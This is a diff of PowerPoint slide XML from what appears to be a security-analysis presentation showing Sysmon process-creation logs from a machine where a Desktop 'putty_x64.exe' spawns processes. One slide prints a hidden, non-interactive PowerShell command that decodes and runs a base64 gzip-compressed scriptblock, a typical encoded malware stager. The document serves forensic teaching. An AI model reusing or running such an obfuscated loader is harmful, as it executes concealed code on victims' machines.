-<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="Obdélník 7">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1516761" y="1834651"/>
-            <a:ext cx="10515600" cy="3600986"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>CurrentDirectory</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\WINDOWS\system32\</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>User: PC2\user</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>LogonGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-818F-5C9A-0000-002032380300}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>LogonId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 0x33832</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>TerminalSessionId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 1</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>IntegrityLevel</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: High</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>Hashes: SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentProcessGuid</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: {9CA6D9DA-9495-5C9A-0000-00108C710901}</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentProcessId</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: 7660</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentImage</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: C:\Users\user\Desktop\</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" b="1" dirty="0"/>
-              <a:t>putty_x64.exe</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ParentCommandLine</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>: ""C:\Users\user\Desktop\putty_x64.exe"" ";"1";"5";;"4";"1";"0";"-9223372036854775808";"589771";"Microsoft-Windows-Sysmon";"5770385f-c22a-43e0-bf4c-06f5698ffbd9";"Microsoft-Windows-Sysmon/Operational";"2236";"2264";"PC2";"S-1-5-18";"26.03.2019 22:14:42";;;"Microsoft-Windows-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>Sysmon</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>/Operational";"System.UInt32[]";"System.Diagnostics.Eventing.Reader.EventBookmark";"Information";"Info";"Process Create (rule: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>ProcessCreate</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>)";"System.Collections.ObjectModel.ReadOnlyCollection`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.String</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]";"System.Collections.Generic.List`1[</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
-              <a:t>System.Diagnostics.Eventing.Reader.EventProperty</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0"/>
-              <a:t>]"</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="Nadpis 10">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13FAC93-3D71-450F-A35B-84C6B766BAAD}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
             <a:off x="0" y="210313"/>
             <a:ext cx="12192000" cy="585926"/>
           </a:xfrm>
@@ -7237,7 +6689,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -7303,7 +6755,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -11660,10 +11112,492 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="Nadpis 1">
+          <p:cNvPr id="8" name="Obdélník 7">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C364312D-5199-4C2F-BDAA-1BC7D0C31194}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C82994BB-411B-4118-B7FA-A89CAA13C009}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1580769" y="982176"/>
+            <a:ext cx="10515600" cy="4893647"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>"Process Create:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>RuleName</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>UtcTime</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: 2019-03-26 21:14:44.276</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Image: C:\Windows\System32\conhost.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>FileVersion</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: 10.0.17134.1 (WinBuild.160101.0800)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Description: Console Window Host</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Product: Microsoft? Windows? Operating System</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Company: Microsoft Corporation</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>CommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: \??\C:\WINDOWS\system32\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>conhost.exe 0xffffffff -ForceV1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>CurrentDirectory</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: C:\WINDOWS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>User: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>PC2\user</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IntegrityLevel</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: High</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>Hashes: SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ParentImage</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ParentCommandLine</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>: ""</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>powershell.exe</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>"" -noni -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>nop</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> -w </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>hidden</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t> -c &amp;([</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>scriptblock</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]::create((New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.StreamReader</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.Compression.GzipStream</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>((New-Object </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.MemoryStream</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>(,[Convert]::FromBase64String('H4sIAFuWmlwCA7VW/W+iSBj+uU36P5CNiZBaRWu7vSabHCAornRlUbR65kJhhFkHcGGo4t7+7/eOQLebbe92LzlCwny8n8/7zLyss8ilOI44/5r7cnZ6MnYSJ+T42mZ+3eBqIRZOTmC1Fut2yr3j+KW03fbi0MHR6vZWyZIERbSYN/uISmmKwgeCUcoL3F/cLEAJuvjw8Am5lPvC1f5s9kn84JBSLFccN0DchRR5bG8Uuw6LpGltCaZ8/+VTc79RPrZ2Kh7tN+/aUbV0e7uAIOHA7m6aIxT5NGiI+0tRhN4i7rsi5PjzaSnxNufBUIN1pgKWwjA5GhbY+a2lgTf/P8Eq74wAPt6/gvVt7R92fwpAsVEm/MP69wu/BOgvpj5zMAU5C649gorW+woCJTOe/Z2wskDl1+XDfi8/ZPTiDn5azk7/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>BrreYUTFCgAA</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>'))),[</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>IO.Compression.CompressionMode</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>]::Decompress))).</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
+                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
+              </a:rPr>
+              <a:t>ReadToEnd</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" dirty="0">
+                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
